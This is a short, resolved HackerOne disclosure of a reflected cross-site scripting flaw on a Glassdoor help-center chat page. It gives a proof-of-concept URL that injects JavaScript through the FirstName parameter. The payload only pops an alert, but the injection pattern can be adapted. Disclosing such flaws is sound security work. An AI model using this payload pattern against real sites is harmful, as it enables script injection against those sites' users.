Reflected XSS on https://help.glassdoor.com/GD_HC_EmbeddedChatVF
Medium
Vulnerability Details
Hi there,
I have found the xss vulnerability at: `https://help.glassdoor.com/GD_HC_EmbeddedChatVF`
**Browsers tested:** Firefox, Chrome, Edge (latest version)
## Steps To Reproduce:
Go to: `https://help.glassdoor.com/GD_HC_EmbeddedChatVF?FirstName=l0cpd%22};a=alert,b=document.domain,a(b)//`
## Supporting Material/References (screenshots, logs, videos):
{F1352792}
Regards,
@l0cpd
## Impact
The attacker can execute JS code.
Actions
View on HackerOneReport Stats
- Report ID: 1244053
- State: Closed
- Substate: resolved
- Upvotes: 45